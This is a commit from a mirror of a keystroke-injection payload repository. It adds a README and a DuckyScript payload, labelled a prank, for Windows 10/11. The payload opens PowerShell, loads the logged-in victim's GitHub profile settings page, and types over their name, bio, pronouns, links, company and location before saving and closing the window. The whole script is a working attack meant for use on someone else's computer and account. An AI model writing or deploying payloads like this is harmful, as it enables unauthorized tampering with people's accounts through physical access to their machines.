mirror of https://github.com/hak5/omg-payloads.git
commit
63aa962c83
|
@ -0,0 +1,87 @@
|
||||||
|
# Change Github Profile Settings
|
||||||
|
|
||||||
|
This script can be used to prank your friends by modifying their Github profiles as you wish.
|
||||||
|
|
||||||
|
**Category**: Prank
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This script can be used to prank your friends by modifying their Github profiles as you wish.
|
||||||
|
|
||||||
|
The script will run a shell and open the default browser in `https://github.com/settings/profile` and close the powershell. When the page is open go to the profile settings TABing many times.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* Internet connection
|
||||||
|
* Logged in Github
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
- Here you should define the new name
|
||||||
|
|
||||||
|
```DuckyScript
|
||||||
|
[17] DEFINE #NAME example
|
||||||
|
```
|
||||||
|
|
||||||
|
- Here you should define the new Biography
|
||||||
|
|
||||||
|
```DuckyScript
|
||||||
|
[18] DEFINE #BIO example
|
||||||
|
```
|
||||||
|
|
||||||
|
- Here you should define the custom pronouns
|
||||||
|
|
||||||
|
```DuckyScript
|
||||||
|
[19] DEFINE #CUSTOM-PRONOUNS example
|
||||||
|
```
|
||||||
|
|
||||||
|
- Here you should define the new personal website url
|
||||||
|
|
||||||
|
```DuckyScript
|
||||||
|
[20] DEFINE #URL example
|
||||||
|
```
|
||||||
|
|
||||||
|
- Here you should define the new social network links
|
||||||
|
|
||||||
|
```DuckyScript
|
||||||
|
[21] DEFINE #SOCIAL-ACCOUNT-1 example
|
||||||
|
[22] DEFINE #SOCIAL-ACCOUNT-2 example
|
||||||
|
[23] DEFINE #SOCIAL-ACCOUNT-3 example
|
||||||
|
[24] DEFINE #SOCIAL-ACCOUNT-4 example
|
||||||
|
```
|
||||||
|
|
||||||
|
- Here you should define the new company
|
||||||
|
|
||||||
|
```DuckyScript
|
||||||
|
[25] DEFINE #COMPANY example
|
||||||
|
```
|
||||||
|
|
||||||
|
- Here you should define the new location
|
||||||
|
|
||||||
|
```DuckyScript
|
||||||
|
[26] DEFINE #LOCATION example
|
||||||
|
```
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Aleff :octocat: </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Linkedin
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,62 @@
|
||||||
|
REM ###################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Change Github Profile Settings |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Prank |
|
||||||
|
REM # Target : Windows 10/11 |
|
||||||
|
REM # |
|
||||||
|
REM ###################################################
|
||||||
|
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Internet connection
|
||||||
|
REM - Logged in Github
|
||||||
|
|
||||||
|
REM You must set the new Profile Settings
|
||||||
|
DEFINE #NAME example
|
||||||
|
DEFINE #BIO example
|
||||||
|
DEFINE #CUSTOM-PRONOUNS example
|
||||||
|
DEFINE #URL example
|
||||||
|
DEFINE #SOCIAL-ACCOUNT-1 example
|
||||||
|
DEFINE #SOCIAL-ACCOUNT-2 example
|
||||||
|
DEFINE #SOCIAL-ACCOUNT-3 example
|
||||||
|
DEFINE #SOCIAL-ACCOUNT-4 example
|
||||||
|
DEFINE #COMPANY example
|
||||||
|
DEFINE #LOCATION example
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRINGLN Start-Process "https://github.com/settings/profile"; exit;
|
||||||
|
REM It depends by the computer power and by the internet connection power
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
REPEAT 37 TAB
|
||||||
|
STRING #NAME
|
||||||
|
REPEAT 4 TAB
|
||||||
|
STRING #BIO
|
||||||
|
TAB
|
||||||
|
REPEAT 4 DOWNARROW
|
||||||
|
STRING #CUSTOM-PRONOUNS
|
||||||
|
TAB
|
||||||
|
STRING #URL
|
||||||
|
TAB
|
||||||
|
STRING #SOCIAL-ACCOUNT-1
|
||||||
|
TAB
|
||||||
|
STRING #SOCIAL-ACCOUNT-2
|
||||||
|
TAB
|
||||||
|
STRING #SOCIAL-ACCOUNT-3
|
||||||
|
TAB
|
||||||
|
STRING #SOCIAL-ACCOUNT-4
|
||||||
|
TAB
|
||||||
|
STRING #COMPANY
|
||||||
|
TAB
|
||||||
|
STRING #LOCATION
|
||||||
|
REPEAT 4 TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
ALT-F4
|
Loading…
Reference in New Issue